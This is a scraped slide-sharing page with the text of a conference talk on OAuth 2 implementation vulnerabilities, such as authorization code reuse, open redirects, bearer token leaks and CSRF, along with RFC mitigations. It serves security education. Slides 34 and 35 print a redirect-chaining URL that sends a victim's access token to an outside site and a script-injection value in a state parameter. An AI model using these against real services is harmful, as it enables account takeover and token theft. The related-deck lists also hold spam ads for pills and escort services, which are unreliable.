[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
 
Detecting headless browsers
Detecting headless browsersDetecting headless browsers
Detecting headless browsers
 
Defending Against Attacks With Rails
Defending Against Attacks With RailsDefending Against Attacks With Rails
Defending Against Attacks With Rails
 
44CON London 2015 - Hunting Asynchronous Vulnerabilities
44CON London 2015 - Hunting Asynchronous Vulnerabilities44CON London 2015 - Hunting Asynchronous Vulnerabilities
44CON London 2015 - Hunting Asynchronous Vulnerabilities
 
Offensive MitM
Offensive MitMOffensive MitM
Offensive MitM
 
Zombiejs
ZombiejsZombiejs
Zombiejs
 
An introduction to PhantomJS: A headless browser for automation test.
An introduction to PhantomJS: A headless browser for automation test.An introduction to PhantomJS: A headless browser for automation test.
An introduction to PhantomJS: A headless browser for automation test.
 
44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root
44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root
44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016
 
Null 14 may_lesser_known_attacks_by_ninadsarang
Null 14 may_lesser_known_attacks_by_ninadsarangNull 14 may_lesser_known_attacks_by_ninadsarang
Null 14 may_lesser_known_attacks_by_ninadsarang
 

Semelhante a Top X OAuth 2 Hacks

OAuth Hacks A gentle introduction to OAuth 2 and Apache Oltu
OAuth Hacks A gentle introduction to OAuth 2 and Apache OltuOAuth Hacks A gentle introduction to OAuth 2 and Apache Oltu
OAuth Hacks A gentle introduction to OAuth 2 and Apache OltuAntonio Sanso
 
Api security with OAuth
Api security with OAuthApi security with OAuth
Api security with OAuththariyarox
 
Securing APIs using OAuth 2.0
Securing APIs using OAuth 2.0Securing APIs using OAuth 2.0
Securing APIs using OAuth 2.0Adam Lewis
 
Devteach 2017 OAuth and Open id connect demystified
Devteach 2017 OAuth and Open id connect demystifiedDevteach 2017 OAuth and Open id connect demystified
Devteach 2017 OAuth and Open id connect demystifiedTaswar Bhatti
 
OAuth and OEmbed
OAuth and OEmbedOAuth and OEmbed
OAuth and OEmbedleahculver
 
OAuth - Open API Authentication
OAuth - Open API AuthenticationOAuth - Open API Authentication
OAuth - Open API Authenticationleahculver
 
OAuth In The Real World : 10 actual implementations you can't guess
OAuth In The Real World : 10 actual implementations you can't guessOAuth In The Real World : 10 actual implementations you can't guess
OAuth In The Real World : 10 actual implementations you can't guessMehdi Medjaoui
 
OAuth - Don’t Throw the Baby Out with the Bathwater
OAuth - Don’t Throw the Baby Out with the Bathwater OAuth - Don’t Throw the Baby Out with the Bathwater
OAuth - Don’t Throw the Baby Out with the Bathwater Apigee | Google Cloud
 
Implementing OAuth
Implementing OAuthImplementing OAuth
Implementing OAuthleahculver
 
Stateless authentication for microservices - Spring I/O 2015
Stateless authentication for microservices - Spring I/O 2015Stateless authentication for microservices - Spring I/O 2015
Stateless authentication for microservices - Spring I/O 2015Alvaro Sanchez-Mariscal
 
The Many Flavors of OAuth - Understand Everything About OAuth2
The Many Flavors of OAuth - Understand Everything About OAuth2The Many Flavors of OAuth - Understand Everything About OAuth2
The Many Flavors of OAuth - Understand Everything About OAuth2Khor SoonHin
 
Stateless authentication for microservices - GR8Conf 2015
Stateless authentication for microservices - GR8Conf 2015Stateless authentication for microservices - GR8Conf 2015
Stateless authentication for microservices - GR8Conf 2015Alvaro Sanchez-Mariscal
 
OAuth you said
OAuth you saidOAuth you said
OAuth you saidOAuth.io
 
Stateless authentication for microservices - Greach 2015
Stateless authentication for microservices - Greach 2015Stateless authentication for microservices - Greach 2015
Stateless authentication for microservices - Greach 2015Alvaro Sanchez-Mariscal
 
Stateless Auth using OAuth2 & JWT
Stateless Auth using OAuth2 & JWTStateless Auth using OAuth2 & JWT
Stateless Auth using OAuth2 & JWTGaurav Roy
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecuritiesamiable_indian
 
An Introduction to OAuth2
An Introduction to OAuth2An Introduction to OAuth2
An Introduction to OAuth2Aaron Parecki
 
Integrating services with OAuth
Integrating services with OAuthIntegrating services with OAuth
Integrating services with OAuthLuca Mearelli
 

Semelhante a Top X OAuth 2 Hacks (20)

OAuth Hacks A gentle introduction to OAuth 2 and Apache Oltu
OAuth Hacks A gentle introduction to OAuth 2 and Apache OltuOAuth Hacks A gentle introduction to OAuth 2 and Apache Oltu
OAuth Hacks A gentle introduction to OAuth 2 and Apache Oltu
 
Api security with OAuth
Api security with OAuthApi security with OAuth
Api security with OAuth
 
Securing APIs using OAuth 2.0
Securing APIs using OAuth 2.0Securing APIs using OAuth 2.0
Securing APIs using OAuth 2.0
 
Devteach 2017 OAuth and Open id connect demystified
Devteach 2017 OAuth and Open id connect demystifiedDevteach 2017 OAuth and Open id connect demystified
Devteach 2017 OAuth and Open id connect demystified
 
OAuth and OEmbed
OAuth and OEmbedOAuth and OEmbed
OAuth and OEmbed
 
OAuth - Open API Authentication
OAuth - Open API AuthenticationOAuth - Open API Authentication
OAuth - Open API Authentication
 
OAuth In The Real World : 10 actual implementations you can't guess
OAuth In The Real World : 10 actual implementations you can't guessOAuth In The Real World : 10 actual implementations you can't guess
OAuth In The Real World : 10 actual implementations you can't guess
 
OAuth - Don’t Throw the Baby Out with the Bathwater
OAuth - Don’t Throw the Baby Out with the Bathwater OAuth - Don’t Throw the Baby Out with the Bathwater
OAuth - Don’t Throw the Baby Out with the Bathwater
 
Implementing OAuth
Implementing OAuthImplementing OAuth
Implementing OAuth
 
Stateless authentication for microservices - Spring I/O 2015
Stateless authentication for microservices - Spring I/O 2015Stateless authentication for microservices - Spring I/O 2015
Stateless authentication for microservices - Spring I/O 2015
 
The Many Flavors of OAuth - Understand Everything About OAuth2
The Many Flavors of OAuth - Understand Everything About OAuth2The Many Flavors of OAuth - Understand Everything About OAuth2
The Many Flavors of OAuth - Understand Everything About OAuth2
 
Stateless authentication for microservices - GR8Conf 2015
Stateless authentication for microservices - GR8Conf 2015Stateless authentication for microservices - GR8Conf 2015
Stateless authentication for microservices - GR8Conf 2015
 
OAuth you said
OAuth you saidOAuth you said
OAuth you said
 
Some OAuth love
Some OAuth loveSome OAuth love
Some OAuth love
 
2023-May.pptx
2023-May.pptx2023-May.pptx
2023-May.pptx
 
Stateless authentication for microservices - Greach 2015
Stateless authentication for microservices - Greach 2015Stateless authentication for microservices - Greach 2015
Stateless authentication for microservices - Greach 2015
 
Stateless Auth using OAuth2 & JWT
Stateless Auth using OAuth2 & JWTStateless Auth using OAuth2 & JWT
Stateless Auth using OAuth2 & JWT
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecurities
 
An Introduction to OAuth2
An Introduction to OAuth2An Introduction to OAuth2
An Introduction to OAuth2
 
Integrating services with OAuth
Integrating services with OAuthIntegrating services with OAuth
Integrating services with OAuth
 

Último

The Top App Development Trends Shaping the Industry in 2024-25 .pdf
The Top App Development Trends Shaping the Industry in 2024-25 .pdfThe Top App Development Trends Shaping the Industry in 2024-25 .pdf
The Top App Development Trends Shaping the Industry in 2024-25 .pdfayushiqss
 
How To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected WorkerHow To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected WorkerThousandEyes
 
The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...
The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...
The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...kalichargn70th171
 
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsUnveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsAlberto González Trastoy
 
%in Midrand+277-882-255-28 abortion pills for sale in midrand
%in Midrand+277-882-255-28 abortion pills for sale in midrand%in Midrand+277-882-255-28 abortion pills for sale in midrand
%in Midrand+277-882-255-28 abortion pills for sale in midrandmasabamasaba
 
10 Trends Likely to Shape Enterprise Technology in 2024
10 Trends Likely to Shape Enterprise Technology in 202410 Trends Likely to Shape Enterprise Technology in 2024
10 Trends Likely to Shape Enterprise Technology in 2024Mind IT Systems
 
introduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdf
introduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdfintroduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdf
introduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdfVishalKumarJha10
 
VTU technical seminar 8Th Sem on Scikit-learn
VTU technical seminar 8Th Sem on Scikit-learnVTU technical seminar 8Th Sem on Scikit-learn
VTU technical seminar 8Th Sem on Scikit-learnAmarnathKambale
 
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdfPayment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdfkalichargn70th171
 
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisa%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisamasabamasaba
 
AI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
AI Mastery 201: Elevating Your Workflow with Advanced LLM TechniquesAI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
AI Mastery 201: Elevating Your Workflow with Advanced LLM TechniquesVictorSzoltysek
 
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...SelfMade bd
 
8257 interfacing 2 in microprocessor for btech students
8257 interfacing 2 in microprocessor for btech students8257 interfacing 2 in microprocessor for btech students
8257 interfacing 2 in microprocessor for btech studentsHimanshiGarg82
 
ManageIQ - Sprint 236 Review - Slide Deck
ManageIQ - Sprint 236 Review - Slide DeckManageIQ - Sprint 236 Review - Slide Deck
ManageIQ - Sprint 236 Review - Slide DeckManageIQ
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️Delhi Call girls
 
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...panagenda
 
A Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docxA Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docxComplianceQuest1
 
AI & Machine Learning Presentation Template
AI & Machine Learning Presentation TemplateAI & Machine Learning Presentation Template
AI & Machine Learning Presentation TemplatePresentation.STUDIO
 
Unlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language ModelsUnlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language Modelsaagamshah0812
 

Último (20)

The Top App Development Trends Shaping the Industry in 2024-25 .pdf
The Top App Development Trends Shaping the Industry in 2024-25 .pdfThe Top App Development Trends Shaping the Industry in 2024-25 .pdf
The Top App Development Trends Shaping the Industry in 2024-25 .pdf
 
How To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected WorkerHow To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected Worker
 
The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...
The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...
The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...
 
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsUnveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
 
%in Midrand+277-882-255-28 abortion pills for sale in midrand
%in Midrand+277-882-255-28 abortion pills for sale in midrand%in Midrand+277-882-255-28 abortion pills for sale in midrand
%in Midrand+277-882-255-28 abortion pills for sale in midrand
 
10 Trends Likely to Shape Enterprise Technology in 2024
10 Trends Likely to Shape Enterprise Technology in 202410 Trends Likely to Shape Enterprise Technology in 2024
10 Trends Likely to Shape Enterprise Technology in 2024
 
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICECHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
 
introduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdf
introduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdfintroduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdf
introduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdf
 
VTU technical seminar 8Th Sem on Scikit-learn
VTU technical seminar 8Th Sem on Scikit-learnVTU technical seminar 8Th Sem on Scikit-learn
VTU technical seminar 8Th Sem on Scikit-learn
 
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdfPayment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
 
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisa%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
 
AI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
AI Mastery 201: Elevating Your Workflow with Advanced LLM TechniquesAI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
AI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
 
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...
 
8257 interfacing 2 in microprocessor for btech students
8257 interfacing 2 in microprocessor for btech students8257 interfacing 2 in microprocessor for btech students
8257 interfacing 2 in microprocessor for btech students
 
ManageIQ - Sprint 236 Review - Slide Deck
ManageIQ - Sprint 236 Review - Slide DeckManageIQ - Sprint 236 Review - Slide Deck
ManageIQ - Sprint 236 Review - Slide Deck
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
 
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
 
A Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docxA Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docx
 
AI & Machine Learning Presentation Template
AI & Machine Learning Presentation TemplateAI & Machine Learning Presentation Template
AI & Machine Learning Presentation Template
 
Unlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language ModelsUnlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language Models
 

Top X OAuth 2 Hacks

  • 1. Top X OAuth 2 Hacks
 (OAuth Implementation vulnerabilities) Antonio Sanso (@asanso) Senior Software Engineer Adobe Research Switzerland
  • 2. Who is this guy, BTW? {  Senior Software Engineer Adobe Research Switzerland {  Internet Bug Bounty, Google Security Hall of Fame, Facebook Security Whitehat, GitHub Security Bug Bounty, Microsoft Honor Roll {  Found vulnerabilities in OpenSSL , Google Chrome, Apple Safari {  Co-Author of “OAuth 2 in Action”
  • 3. Co-author of “OAuth 2 in Action”
 https://www.manning.com/books/oauth-2-in-action ctwvdt17
  • 4. Agenda { Introducing OAuth 2.0 { The “OAuth dance” { OAuth 2.0 Implementation Vulnerabilities ★
  • 5. Why OAuth? Several web sites offer you the chance to import the list of your contacts. It ONLY requires you giving your username and password. HOW NICE
  • 6. A bit of history – OAuth 1.0a
  • 7. A bit of history – OAuth 2.0 2 years X
  • 8. The good { OAuth 2.0 is easier to use and implement (compared to OAuth 1.0) { Wide spread and continuing growing { Short lived Tokens { Encapsulated Tokens * Image taken from the movie "The Good, the Bad and the Ugly"
  • 9. The bad { No signature (relies solely on SSL/TLS ), Bearer Tokens { No built-in security { Can be dangerous if used from not experienced people { Burden on the client * Image taken from the movie "The Good, the Bad and the Ugly"
  • 10. The ugly { Too many compromises. Working group did not take clear decisions { Oauth 2.0 spec is not a protocol, it is rather a framework - RFC 6749 :The OAuth 2.0 Authorization Framework { Not interoperable - from the spec: “…this specification is likely to produce a wide range of non-interoperable implementations.” !! { Mobile integration (web views) { A lot of FUD * Image taken from the movie "The Good, the Bad and the Ugly"
  • 11. So what should I use? { No many alternatives { OAuth 1.0 does not scale (and it is complicated)
  • 12. OAuth flows { Authorization Code Grant (aka server side flow) ✓ { Implicit Grant (aka Client side flow) ✓ { Resource Owner Password Credentials Grant { Client Credentials Grant
  • 13. { Resource Owner (Alice) { Client (Bob, worker at www.printondemand.biz ) { Server (Carol from Facebook) { Attacker (Antonio) OAuth Actors www.printondemand.biz
  • 14. Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz 1. I want an Authz Code 2. Printondemand wants an Authz Code 3. Login and authorize 4. Here the Authz Code 5. Here we go 8. Give me the profile pictures, here is the Access Token Authorization: Bearer 1017097752d5f18f716cc90ac8a5e4c2a9ace6b9 ★
  • 15. Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz 1. I want an Authz Code 2. Printondemand wants an Authz Code 3. Here the Authz Code 4. Here we go ★ GET /oauth/authorize?response_type=code&! client_id=bfq5abhdq4on33igtmd74ptrli-9rci_8_9&! scope=photo&state=0f9c0d090e74c2a136e41f4a97ed46d29bc9b0251! &redirect_uri=https%3A%2F%2Fwww.printondemand.biz%2Fcallback ! HTTP/1.1! Host: server.oltu.com! ! Authorization Server
  • 16. Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz 1. I want an Authz Code 2. Printondemand wants an Authz Code 3. Here the Authz Code 4. Here we go ★ HTTP/1.1 302 Found! Location: https://www.printondemand.biz/callback? code=SplxlOBeZQQYbYS6WxSbIA! ! ! Authorization Server
  • 17. Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz ★ Authorization Server POST /oauth/token HTTP/1.1! Host: server.oltu.com! Authorization: Basic czZCaGRSa3F0MzpnWDFmQmF0M2JW ! Content-Type: application/x-www-form-urlencoded! ! grant_type=authorization_code&code=SplxlOBeZQQYbYS6WxSbIA! &state=0f9c0d090e74c2a136e41f4a97ed46d29bc9b0251&! redirect_uri=https%3A%2F%2Fwww.printondemand.biz%2Fcallback ! ! !
  • 18. Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz ★ Authorization Server HTTP/1.1 200 OK! Content-Type: application/json;charset=UTF-8! ! {! "access_token":"1017097752d5f18f716cc90ac8a5e4c2a9ace6b9”,! "expires_in":3600 ! }! !
  • 19. Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz ★ Resource Server GET /photo HTTP/1.1! Host: server.oltu.com! Authorization: Bearer 1017097752d5f18f716cc90ac8a5e4c2a9ace6b9! !
  • 20. Traditional OAuth “dance” - Authorization Code Grant aka server side flow From “OAuth 2 In Action” by Justin Richer and Antonio Sanso, Copyrights 2017 Resource Owner Authorization Server Protected Resource Client Resource owner’s credentials Client’s credentials Authorization code Access token
  • 21. Traditional OAuth “dance” #2- client side flow Client inside the browser 1. Printondemand wants an Access Token 2. Login and authorize 3. Here the Access Token 4. Give me the profile pictures, here is the Access Token ★
  • 22. Traditional OAuth “dance” – Implicit Grant aka client side flow From “OAuth 2 In Action” by Justin Richer and Antonio Sanso, Copyrights 2017 Resource Owner Authorization Server Protected Resource Client Inside the Browser Implicit grant type uses only the front channel since the client is inside the browser
  • 23. OAuth entication orization { OAuth 2.0 is NOT an authentication protocol. It is an access delegation protocol. { It can-be-used as an authentication protocol { BUT HANDLE WITH CARE ★
  • 24. #10 The Postman Always Rings Twice From “OAuth 2 In Action” by Justin Richer and Antonio Sanso, Copyrights 2017 *Image taken from the movie The Postman Always Rings Twice""
  • 25. From “OAuth 2 In Action” by Justin Richer and Antonio Sanso, Copyrights 2017 #10 The Postman Always Rings Twice *Image taken from the movie The Postman Always Rings Twice""
  • 26. #10 The Postman Always Rings Twice Mitigation RFC 6749 - Section-4.1.3 The client MUST NOT use the authorization code more than once. If an authorization code is used more than once, the authorization server MUST deny the request and SHOULD revoke (when possible) all tokens previously issued based on that authorization code. Attack http://intothesymmetry.blogspot.ch/2014/02/oauth-2-attacks-and-bug-bounties.html *Image taken from the movie The Postman Always Rings Twice""
  • 27. *Image taken from the movie Match Point"" RFC 6749 - Section-4.1.3 ...if the "redirect_uri" parameter was included in the initial authorization request as described in Section 4.1.1, and if included ensure that their values are identical. Attack http://homakov.blogspot.ch/2014/02/how-i-hacked-github-again.html #9 Match Point
  • 28. Resource Owner Authorization Server Protected Resource Client Resource owner’s credentials Client’s credentials Authorization code Access token #9 Match Point From “OAuth 2 In Action” by Justin Richer and Antonio Sanso, Copyrights 2017 POST /oauth/token HTTP/1.1! Host: server.oltu.com! Authorization: Basic czZCaGRSa3F0MzpnWDFmQmF0M2JW ! Content-Type: application/x-www- form-urlencoded! ! grant_type=authorization_code&code =SplxlOBeZQQYbYS6WxSbIA! &state=0f9c0d090e74c2a136e41f4a97e d46d29bc9b0251&! redirect_uri=https%3A%2F %2Fwww.printondemand.biz %2Fcallback ! ! ! GET /oauth/authorize?response_type=code&! client_id=bfq5abhdq4on33igtmd74ptrli-9rci_8_9&! scope=profile&state=0f9c0d090e74c2a136e41f4a97ed46d29bc9b0251! &redirect_uri=https%3A%2F%2Fwww.printondemand.biz%2Fcallback ! HTTP/1.1! Host: server.oltu.com! ! *Image taken from the movie Match Point""
  • 29. #8 Open redirect in rfc6749
 http://intothesymmetry.blogspot.ie/2015/04/open-redirect-in-rfc6749-aka-oauth-20.html
 • Owasp Top10 #10 • Controversial web vulnerability • Often they are relatively benign • …but an open redirect is handy sometime (right? ) RFC 6749 - Section-4.1.2.1 ... If the resource owner denies the access request or if the request fails for reasons other than a missing or invalid redirection URI, the authorization server informs the client by adding the following parameters to the query component of the redirection URI using the "application/x-www-form- urlencoded" format, per Appendix B:.
  • 30. From “OAuth 2 In Action” by Justin Richer and Antonio Sanso, Copyrights 2017 #8 Open redirect in rfc6749
 http://intothesymmetry.blogspot.ie/2015/04/open-redirect-in-rfc6749-aka-oauth-20.html

  • 31. From “OAuth 2 In Action” by Justin Richer and Antonio Sanso, Copyrights 2017 #8 Open redirect in rfc6749
 http://intothesymmetry.blogspot.ie/2015/04/open-redirect-in-rfc6749-aka-oauth-20.html

  • 34. #8 Open redirect in rfc6749
 http://andrisatteka.blogspot.ch/2014/09/how-microsoft-is-giving-your-data-to.html
 https://login.live.com/oauth20_authorize.srf? client_id=0000000044002503&response_type=token&scope=wli.contacts_emails& redirect_uri=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fh%5B%5D%26u %3Dgraph.facebook.com%252Foauth%252Fauthorize%253Ftype %253Dweb_server%2526scope%253De%2526client_id %253D260755904036570%2526redirect_uri%253Dhttp%253A%252F %252Fsimcracy.com http://simcracy.com#access_token=ACCESS_TOKEN
  • 35. #8 Open redirect in rfc6749 – 
 Bonus Safari URI Spoofing (CVE-2015-5764) Moves: https://api.moves-app.com/oauth/v1/authorize? response_type=code&client_id=bc88FitX1298KPj2WS259BBMa9_KCfL3& redirect_uri=data%3Atext%2Fhtml%2Ca&state=<script>alert()</ script> CVE-2015-5764 http://intothesymmetry.blogspot.it/2015/09/apple-safari-uri-spoofing-cve-2015-5764.html
  • 36. #8 Open redirect in rfc6749 – Mitigations https://tools.ietf.org/html/draft-ietf-oauth-closing-redirectors-00 • Respond with an HTTP 400 (Bad Request) status code. • Perform a redirect to an intermediate URI under the control of the AS to clear referrer information in the browser that may contain security token information • Fragment "#" MUST be appended to the error redirect URI. This prevents the browser from reattaching the fragment from a previous URI to the new location URI.
  • 37. #7 Native apps – Which OAuth flow ? • It is NOT recommended that native applications use the implicit flow. • Native clients CAN NOT protect a client_secret unless it is configured at runtime as in the dynamic registration case (RFC 7591). Attack http://stephensclafani.com/2014/07/29/hacking-facebooks-legacy-api- part-2-stealing-user-sessions/
  • 38. #6 Bearer Tokens The OAuth 2.0 Authorization Framework: Bearer Token Usage” [RFC 6750] GET /resource HTTP/1.1 Host: server.example.com Authorization: Bearer mF_9.B5f-4.1JqM POST /resource HTTP/1.1 Host: server.example.com Content-Type: application/x-www-form-urlencoded access_token=mF_9.B5f-4.1JqM GET /resource?access_token=mF_9.B5f-4.1JqM HTTP/1.1 Host: server.example.com
  • 39. #6 Bearer Tokens { The access token ends up being logged in access.log files (being the access token part of the URI) - http://thehackernews.com/2013/10/vulnerability-in-facebook-app- allows.html { People tend to be indiscriminate on what copy and past in public forum when searching for answer (e.g. Stackoverflow). { There is a risk of access token leakage through the referrer - http://intothesymmetry.blogspot.it/2015/10/on-oauth-token-hijacks- for-fun-and.html
  • 40. #6 Bearer Tokens http://intothesymmetry.blogspot.it/2015/10/on-oauth-token-hijacks-for-fun-and.htmltml
 GET /! Host: sanso.github.io! Referer: https://word.office.live.com/……/#access_token=3AAQ…!
  • 41. #5 Cross-site request forgery {  CSRF = Cross-site request forgery {  OWASP Top 10 - A8 Cross-Site Request Forgery (CSRF) {  Browsers make requests (with cookies) to any other origin From “OAuth 2 In Action” by Justin Richer and Antonio Sanso, Copyrights 2017
  • 42. #5 Cross-site request forgery Authorization Server
  • 43. #5 Cross-site request forgery Authorization Server https://www.synack.com/2015/10/08/how-i-hacked-hotmail/
  • 44. #5 Cross-site request forgery Authorization Server
  • 45. #5 Cross-site request forgery Authorization Server Other Attacks {  http://homakov.blogspot.ch/2014/12/blatant-csrf-in-doorkeeper-most- popular.html {  http://intothesymmetry.blogspot.ch/2014/12/cross-site-request-forgery-in- github.html
  • 46. #4 Cross-site request forgery OAuth Client From “OAuth 2 In Action” by Justin Richer and Antonio Sanso, Copyrights 2017
  • 47. #4 Cross-site request forgery OAuth Client http://blog.intothesymmetry.com/2017/04/csrf-in-facebookdropbox-mallory-added.html
  • 48. Mitigation RFC 6749 An opaque value used by the client to maintain state between the request and callback. The authorization server includes this value when redirecting the user-agent back to the client. The parameter SHOULD be used for preventing cross-site request forgery (CSRF). #4 Cross-site request forgery OAuth Client Attacks {  http://homakov.blogspot.ch/2012/07/saferweb-most-common-oauth2.html {  https://blog.srcclr.com/spring-social-core-vulnerability-disclosure/ GET /oauth/authorize?response_type=code&! client_id=bfq5abhdq4on33igtmd74ptrli-9rci_8_9&! scope=profile&state=0f9c0d090e74c2a136e41f4a97ed46d29bc9b0251! &redirect_uri=https%3A%2F%2Fwww.printondemand.biz%2Fcallback&state=dvlhl25gsfkk! ! !
  • 49. #3 “Confused Deputy” aka “The Devil Wears Prada” www.printondemand.biz 1. I want an Access Token 2. Printondemand wants an Access Token 3. Login and authorize 4. Here the Access Token 5. Here we go 7. www.printondemand.biz uses the profile information from Facebook to log in N.B. www.printondemand.biz does not have any security. They have not Authenticated the User! * Image taken from the movie "The Devil Wears Prada" ★
  • 50. 1. I want an Access Token 2. Printondemand wants an Access Token 3. Login and authorize 4. Here the Access Token 5. Here we go What does this tell us ? That www.printondemand.biz authenticated us, given an Access Token 7. AUTHENTICATED www.printondemand.biz #3 “Confused Deputy” aka “The Devil Wears Prada” ★ * Image taken from the movie "The Devil Wears Prada"
